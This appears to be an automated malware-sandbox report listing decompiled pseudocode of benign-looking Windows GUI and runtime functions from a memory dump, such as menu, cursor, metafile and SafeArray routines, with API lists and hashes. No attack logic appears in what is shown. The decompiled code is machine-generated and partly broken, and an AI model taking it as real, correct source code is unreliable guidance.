API ID: MessageSend
String ID: $|F$TDBEdit$TDBMemo$pXF
API String ID: 3850602802-2244556849
Opcode ID: e5ea7f58dfe15059218696f4bfb16ac77a01b2a9494904b98044b0598c7e998e
Instruction ID: 42a2ebdc86a7ceb2cdf3d471dffb8ad084e77520ad1fa4256563c2d205324a6a
Opcode Fuzzy Hash: e5ea7f58dfe15059218696f4bfb16ac77a01b2a9494904b98044b0598c7e998e
Instruction Fuzzy Hash: 71413A746102105BCB10EF6BC991A5A77E9AF45708F10907BAC00AB3A3EA7DEC458B5E

Uniqueness

Uniqueness Score: -1.00%

Function 00423240, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00423240(void* __eax, void* __edx) {
				BYTE* _v8;
				int _v12;
				struct HDC__* _v16;
				short _v18;
				signed int _v24;
				short _v26;
				short _v28;
				char _v38;
				void* __ebx;
				void* __ebp;
				signed int _t35;
				void* _t66;
				intOrPtr _t68;
				intOrPtr _t78;
				void* _t81;
				void* _t84;
				void* _t86;
				intOrPtr _t87;

				_t84 = _t86;
				_t87 = _t86 + 0xffffffdc;
				_t81 = __edx;
				_t66 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
					return __eax;
				} else {
					E00402EF0( &_v38, 0x16);
					_t68 =  *((intOrPtr*)(_t66 + 0x28));
					_v38 = 0x9ac6cdd7;
					_t35 =  *((intOrPtr*)(_t68 + 0x18));
					if(_t35 != 0) {
						_v24 = _t35;
					} else {
						_v24 = 0x60;
					}
					_v28 = MulDiv( *(_t68 + 0xc), _v24 & 0x0000ffff, 0x9ec);
					_v26 = MulDiv( *(_t68 + 0x10), _v24 & 0x0000ffff, 0x9ec);
					_v18 = E00421844( &_v38);
					_v16 = GetDC(0);
					_push(_t84);
					_push(0x42337b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t87;
					_v12 = GetWinMetaFileBits( *(_t68 + 8), 0, 0, 8, _v16);
					_v8 = E00402754(_v12);
					_push(_t84);
					_push(0x42335b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t87;
					if(GetWinMetaFileBits( *(_t68 + 8), _v12, _v8, 8, _v16) < _v12) {
						E00420A54(_t68);
					}
					E00416B18(_t81, 0x16,  &_v38);
					E00416B18(_t81, _v12, _v8);
					_pop(_t78);
					 *[fs:eax] = _t78;
					_push(E00423362);
					return E00402774(_v8);
				}
			}

0x00423241
0x00423243
0x00423248
0x0042324a
0x00423250
0x00423387
0x00423256
0x00423260
0x00423265
0x00423268
0x0042326f
0x00423276
0x00423280
0x00423278
0x00423278
0x00423278
0x00423297
0x004232ae
0x004232ba
0x004232c5
0x004232ca
0x004232cb
0x004232d0
0x004232d3
0x004232e9
0x004232f4
0x004232f9
0x004232fa
0x004232ff
0x00423302
0x0042331f
0x00423321
0x00423321
0x00423330
0x0042333d
0x00423344
0x00423347
0x0042334a
0x0042335a
0x0042335a

APIs

MulDiv.KERNEL32(?,?,000009EC), ref: 00423292
MulDiv.KERNEL32(?,?,000009EC), ref: 004232A9
GetDC.USER32(00000000), ref: 004232C0
GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,0042337B,?,00000000,?,?,000009EC,?,?,000009EC), ref: 004232E4
GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,0042335B,?,?,00000000,00000000,00000008,?,00000000,0042337B), ref: 00423317

Strings

`, xrefs: 00423278

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: BitsFileMeta
String ID: `
API String ID: 858000408-2679148245
Opcode ID: def7def30d5504c3a779a3c648b4e8f64b84dfcbde0fafac2c69354ed9fbbb2f
Instruction ID: d07a96629a61a65ab75161e25bb4c2be328d2c6da99f1a666cfa25fa5b2d3ef1
Opcode Fuzzy Hash: def7def30d5504c3a779a3c648b4e8f64b84dfcbde0fafac2c69354ed9fbbb2f
Instruction Fuzzy Hash: 70313275B04258ABDB00DF95D881AAEB7B8EF08704F5144A6F904FB281D7789E40DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041C04C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0041C04C() {
				char _v5;
				intOrPtr* _v12;
				char _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t16;
				char _t19;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t24;
				intOrPtr _t34;
				void* _t39;
				intOrPtr _t46;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr _t51;
				void* _t53;
				void* _t55;
				void* _t58;
				void* _t60;
				intOrPtr _t61;

				_t58 = _t60;
				_t61 = _t60 + 0xfffffff0;
				_push(_t39);
				_push(_t55);
				_push(_t53);
				_t16 = GetCurrentThreadId();
				_t47 =  *0x491298; // 0x492030
				if(_t16 !=  *_t47) {
					_v20 = GetCurrentThreadId();
					_v16 = 0;
					_t46 =  *0x491118; // 0x410414
					E0040A250(_t39, _t46, 1, _t53, _t55, 0,  &_v20);
					E00403DA8();
				}
				if( *0x492a00 == 0) {
					_v5 = 0;
					return _v5;
				} else {
					_push(0x492a04);
					L004068AC();
					_push(_t58);
					_push(0x41c162);
					_push( *[fs:eax]);
					 *[fs:eax] = _t61;
					if( *0x4764b8 == 0) {
						L5:
						_t19 = 0;
					} else {
						_t34 =  *0x4764b8; // 0x0
						if( *((intOrPtr*)(_t34 + 8)) > 0) {
							_t19 = 1;
						} else {
							goto L5;
						}
					}
					_v5 = _t19;
					if(_v5 != 0) {
						while(1) {
							_t21 =  *0x4764b8; // 0x0
							if( *((intOrPtr*)(_t21 + 8)) <= 0) {
								break;
							}
							_t22 =  *0x4764b8; // 0x0
							_v12 = E004141BC(_t22, 0);
							_t24 =  *0x4764b8; // 0x0
							E004140AC(_t24, 0);
							 *[fs:eax] = _t61;
							 *((intOrPtr*)( *_v12 + 0x20))( *[fs:eax], 0x41c115, _t58);
							_pop(_t51);
							 *[fs:eax] = _t51;
							SetEvent( *(_v12 + 4));
						}
						 *0x492a00 = 0;
					}
					_pop(_t48);
					 *[fs:eax] = _t48;
					_push(E0041C16D);
					_push(0x492a04);
					L004069F4();
					return 0;
				}
			}

APIs

GetCurrentThreadId.KERNEL32 ref: 0041C055
GetCurrentThreadId.KERNEL32 ref: 0041C064
RtlEnterCriticalSection.KERNEL32(00492A04,?,?,00000000), ref: 0041C09F
SetEvent.KERNEL32(?,?,00492A04,?,?,00000000), ref: 0041C133
RtlLeaveCriticalSection.KERNEL32(00492A04,0041C16D,00492A04,?,?,00000000), ref: 0041C15C

Strings

0 I, xrefs: 0041C05A

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalCurrentSectionThread$EnterEventLeave
String ID: 0 I
API String ID: 130076905-1101979924
Opcode ID: 4784148f2ae588830669afe7527ee21dc11d938f8ae2d1df5870d658aaf90949
Instruction ID: 94935ce0e79f478707c4f0092ec789d221ad1f1ce9d64de937dfad475c4fce94
Opcode Fuzzy Hash: 4784148f2ae588830669afe7527ee21dc11d938f8ae2d1df5870d658aaf90949
Instruction Fuzzy Hash: 4A314835684280EFD710DB69DC81BAA7BE4EB49304F1680BBE405936A2C77D58C0CB2C

Uniqueness

Uniqueness Score: -1.00%

Function 004457D4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004457D4(int __eax, void* __edx) {
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t46;
				int _t47;
				intOrPtr* _t48;

				_t18 = __eax;
				_t48 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E004457D4(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E00445904(__eax));
					_t47 = _t18;
					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
					while(_t47 > 0) {
						_t46 = _t47 - 1;
						_t18 = GetMenuState(E00445904(_t48), _t46, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E00445904(_t48), _t46, 0x400);
							_t40 = 1;
						}
						_t47 = _t47 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
							L14:
							E004456A0(_t48);
							L15:
							return  *((intOrPtr*)( *_t48 + 0x3c))();
						}
						_t44 =  *0x4442f4; // 0x444340
						if(E00403768( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E00445904(_t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t48 + 0x34));
							 *(_t48 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}

Strings

@CD, xrefs: 0044585D

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: @CD
API String ID: 0-624872861
Opcode ID: 17d3a8e1011081918dbed822c41ac9534dfc0f55005bde3bc3fbf6dfbce4f4f7
Instruction ID: a350e4e5298d38d449358e174567392fc5b2a5dee204b2a5268803923fd81d6a
Opcode Fuzzy Hash: 17d3a8e1011081918dbed822c41ac9534dfc0f55005bde3bc3fbf6dfbce4f4f7
Instruction Fuzzy Hash: F4117561B01A49ABEE60BE7A8D0575B37889F8175CF04042BBC059F353DE7CCC25865C

Uniqueness

Uniqueness Score: -1.00%

Function 004551E4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004551E4(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x108) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x492714 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t20 =  *((intOrPtr*)(_t33 + 0x44));
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
						L7:
						if(E00432A88(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E0043C1F4(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}

APIs

GetCapture.USER32 ref: 00455207
SendMessageA.USER32(00000000,-0000BBEE,?,?), ref: 0045525B
GetWindowLongA.USER32 ref: 0045526B
SendMessageA.USER32(00000000,-0000BBEE,?,?), ref: 0045528A

Strings

dZG, xrefs: 004551E5

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CaptureLongWindow
String ID: dZG
API String ID: 1158686931-410245891
Opcode ID: fad3518948819a6feef1e5a3d68b9e05a647f4bfc9ed138af2eda57894bfc5c0
Instruction ID: 312b808e23363fad402cddb0ed21c048764b3ff5ec72132a34d4933a1a5ad938
Opcode Fuzzy Hash: fad3518948819a6feef1e5a3d68b9e05a647f4bfc9ed138af2eda57894bfc5c0
Instruction Fuzzy Hash: 9511AC70304A099FD620BA9AD990B3773DCAF19301F1004BEBD6AD7343DA68EC448B69

Uniqueness

Uniqueness Score: -1.00%

Function 00427598, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00427598(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x492ac9 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A9C();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x492ab0; // 0x427598
					 *0x492ab0 = E00427194(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x492ab0(_t27, _t29);
				}
				return _t24;
			}

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004275F0
GetSystemMetrics.USER32 ref: 00427605
GetSystemMetrics.USER32 ref: 00427610
lstrcpy.KERNEL32(?,DISPLAY), ref: 0042763A

Part of subcall function 00427194: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427214

Strings

DISPLAY, xrefs: 00427631
GetMonitorInfoA, xrefs: 004275B0

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoA
API String ID: 2545840971-1370492664
Opcode ID: 6b745dedefc078b3f07a6590a1babe7185af016361bbaa0b1ba7209f26baa8cc
Instruction ID: 8e8e86ab010541f17aa2f2fa631026a53dbcdc8c02397220a03315d45d02f7d6
Opcode Fuzzy Hash: 6b745dedefc078b3f07a6590a1babe7185af016361bbaa0b1ba7209f26baa8cc
Instruction Fuzzy Hash: D211D232705B20AED730CF65AC44BA7B7A9EB15724F40453BEC0AA7640D3B4A800CBAC

Uniqueness

Uniqueness Score: -1.00%

Function 004238C4, Relevance: 10.6, APIs: 7, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E004238C4(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				int _t37;
				intOrPtr _t44;
				void* _t46;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t16 = __eax;
				_t49 = _t51;
				_t52 = _t51 + 0xfffffbf0;
				_v8 = __edx;
				_t46 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L5:
					return _t16;
				} else {
					_t16 = E00421290(_v8, 0xff,  &_v1044);
					_t37 = _t16;
					if(_t37 == 0) {
						goto L5;
					} else {
						_v12 = GetDC(0);
						_v16 = CreateCompatibleDC(_v12);
						_v20 = SelectObject(_v16, _t46);
						_push(_t49);
						_push(0x423973);
						_push( *[fs:eax]);
						 *[fs:eax] = _t52;
						SetDIBColorTable(_v16, 0, _t37,  &_v1044);
						_pop(_t44);
						 *[fs:eax] = _t44;
						_push(0x42397a);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						return ReleaseDC(0, _v12);
					}
				}
			}

0x004238c4
0x004238c5
0x004238c7
0x004238cf
0x004238d2
0x004238d6
0x0042397a
0x0042397f
0x004238e7
0x004238f5
0x004238fa
0x004238fe
0x00000000
0x00423900
0x00423907
0x00423913
0x00423920
0x00423925
0x00423926
0x0042392b
0x0042392e
0x0042393f
0x00423946
0x00423949
0x0042394c
0x00423959
0x00423962
0x00423972
0x00423972
0x004238fe

APIs

Part of subcall function 00421290: GetObjectA.GDI32(00000000,00000004), ref: 004212A7
Part of subcall function 00421290: GetPaletteEntries.GDI32(00000000,00000000,?,?), ref: 004212CA

GetDC.USER32(00000000), ref: 00423902
CreateCompatibleDC.GDI32(?), ref: 0042390E
SelectObject.GDI32(?), ref: 0042391B
SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00423973,?,?,?,?,00000000), ref: 0042393F
SelectObject.GDI32(?,?), ref: 00423959
DeleteDC.GDI32(?), ref: 00423962
ReleaseDC.USER32 ref: 0042396D

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
String ID:
API String ID: 4046155103-0
Opcode ID: fdffc89f9bf17007cdbeb81672fd9c93577e77287074e513d4ba16e13166d89f
Instruction ID: 667baed9180a13e4194034e7c5b6ddee86044931335147c1621752bc5a4629d1
Opcode Fuzzy Hash: fdffc89f9bf17007cdbeb81672fd9c93577e77287074e513d4ba16e13166d89f
Instruction Fuzzy Hash: 43119AB1E042196BDB10EFE5DC41AAEB3FCEB08704F4144BAF504E7281D6789E508758

Uniqueness

Uniqueness Score: -1.00%

Function 0045369C, Relevance: 10.6, APIs: 7, Instructions: 57
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0045369C(long __eax, void* __ecx, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				void* _t21;
				struct HWND__* _t27;
				short _t28;
				void* _t30;
				struct tagPOINT* _t31;

				_t21 = __ecx;
				_t7 = __eax;
				_t31 = _t30 + 0xfffffff8;
				_t28 = __edx;
				_t19 = __eax;
				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
					L6:
					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
				} else {
					 *((short*)(__eax + 0x44)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E00453674(_t19, _t28));
						goto L6;
					} else {
						GetCursorPos(_t31);
						_push(_v24.y);
						_t27 = WindowFromPoint(_v24);
						if(_t27 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t27, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t27, 0x20, _t27, E00407274(SendMessageA(_t27, 0x84, 0, E004072FC(_t31, _t21)), 0x200));
							}
						}
					}
				}
				return _t7;
			}

APIs

GetCursorPos.USER32 ref: 004536B7
WindowFromPoint.USER32(?,?), ref: 004536C4
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004536D2
GetCurrentThreadId.KERNEL32 ref: 004536D9
SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 004536F2
SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00453709
SetCursor.USER32(00000000), ref: 0045371B

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: b5d7de7c1deb21329f82a5cd8529cecc2afe6e149f4171b84b68cc7cd1c67b3b
Instruction ID: 54b035ec9656a43d8e6ff755461e91d3997496fb98433e198fb73bd70917e05c
Opcode Fuzzy Hash: b5d7de7c1deb21329f82a5cd8529cecc2afe6e149f4171b84b68cc7cd1c67b3b
Instruction Fuzzy Hash: C901D872A0820025D6203E754C86B3F2958CF85B96F10407FB904BA2C3EA3EAC05526E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C40C, Relevance: 9.1, APIs: 6, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040C40C(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t44;
				signed int _t49;
				signed short* _t56;
				char* _t58;
				void* _t64;
				intOrPtr* _t69;
				signed short* _t76;
				signed short* _t79;
				intOrPtr _t88;
				void* _t90;
				void* _t92;
				void* _t93;
				void* _t94;
				intOrPtr* _t102;
				void* _t106;
				intOrPtr _t107;
				char* _t108;
				void* _t109;

				_v780 = __ecx;
				_v776 = __eax;
				_t44 =  *((intOrPtr*)(__edx));
				_t97 = _t44 & 0x00000fff;
				if((_t44 & 0x00000fff) != 0xc) {
					_push(__edx);
					_t88 = _v776;
					_push(_t88);
					L0040C108();
					return _t88;
				}
				if((_t44 & 0x00000040) == 0) {
					_v792 =  *((intOrPtr*)(__edx + 8));
				} else {
					_v792 =  *((intOrPtr*)( *((intOrPtr*)(__edx + 8))));
				}
				_v788 =  *_v792 & 0x0000ffff;
				_t90 = _v788 - 1;
				if(_t90 >= 0) {
					_t94 = _t90 + 1;
					_t106 = 0;
					_t108 =  &_v772;
					do {
						_v804 = _t108;
						_push(_v804 + 4);
						_t16 = _t106 + 1; // 0x1
						_t76 = _v792;
						_push(_t76);
						L0040C130();
						if(_t76 != 0) {
							E004028B0(0x14);
						}
						_push( &_v784);
						_t19 = _t106 + 1; // 0x1
						_t79 = _v792;
						_push(_t79);
						L0040C138();
						if(_t79 != 0) {
							E004028B0(0x14);
						}
						 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
						_t106 = _t106 + 1;
						_t108 = _t108 + 8;
						_t94 = _t94 - 1;
					} while (_t94 != 0);
				}
				_push( &_v772);
				_t49 = _v788;
				_push(_t49);
				_push(0xc);
				L0040C120();
				_t107 = _t49;
				if(_t107 == 0) {
					E004028B0(0x12);
				}
				E0040C2CC(_v776, _t97);
				 *_v776 = 0x200c;
				 *((intOrPtr*)(_v776 + 8)) = _t107;
				_t92 = _v788 - 1;
				if(_t92 >= 0) {
					_t93 = _t92 + 1;
					_t69 =  &_v768;
					_t102 =  &_v260;
					do {
						 *_t102 =  *_t69;
						_t102 = _t102 + 4;
						_t69 = _t69 + 8;
						_t93 = _t93 - 1;
					} while (_t93 != 0);
					do {
						goto L17;
					} while (_t64 != 0);
					return _t64;
				}
				L17:
				_push( &_v796);
				_push( &_v260);
				_t56 = _v792;
				_push(_t56);
				L0040C150();
				if(_t56 != 0) {
					E004028B0(0x14);
				}
				_push( &_v800);
				_t58 =  &_v260;
				_push(_t58);
				_push(_t107);
				L0040C150();
				if(_t58 != 0) {
					E004028B0(0x14);
				}
				_v780();
				_t64 = E0040C3B0(_v788 - 1, _t109);
			}

APIs

VariantCopy.OLEAUT32(?), ref: 0040C43C
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040C4A1
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040C4C3
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040C502
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040C56D
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040C58C

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
Instruction ID: 53c8fa50fa3af74e803547065bbe6c49ea8385ed887272acae8b06600fc0eaa4
Opcode Fuzzy Hash: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
Instruction Fuzzy Hash: BB51E2759011299BDB22DB59CDD0ADAB3BCBF08304F0042EAE649E7381D674AF818F65

Uniqueness

Uniqueness Score: -1.00%

Function 0042153C, Relevance: 9.1, APIs: 6, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0042153C(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed int* _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				struct HDC__* _v44;
				signed int* _t36;
				signed int _t39;
				signed int _t42;
				signed int* _t52;
				signed int _t56;
				intOrPtr _t66;
				void* _t72;
				void* _t73;
				void* _t74;
				intOrPtr _t75;

				_t73 = _t74;
				_t75 = _t74 + 0xffffff90;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t52 = _a8;
				_v24 = _v16 << 4;
				_v20 = E004083C4(_v24, __eflags);
				 *[fs:edx] = _t75;
				_t56 = _v24;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:edx], 0x421833, _t73, __edi, __esi, __ebx, _t72);
				if(( *_t52 | _t52[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t52;
					_t36[1] = _t52[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_a4[1] = GetSystemMetrics(0xc);
				}
				_v44 = GetDC(0);
				if(_v44 == 0) {
					E00420A00(_t56);
				}
				_push(_t73);
				_push(0x421625);
				_push( *[fs:edx]);
				 *[fs:edx] = _t75;
				_t39 = GetDeviceCaps(_v44, 0xe);
				_t42 = _t39 * GetDeviceCaps(_v44, 0xc);
				if(_t42 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t42;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_push(E0042162C);
				return ReleaseDC(0, _v44);
			}

0x0042153d
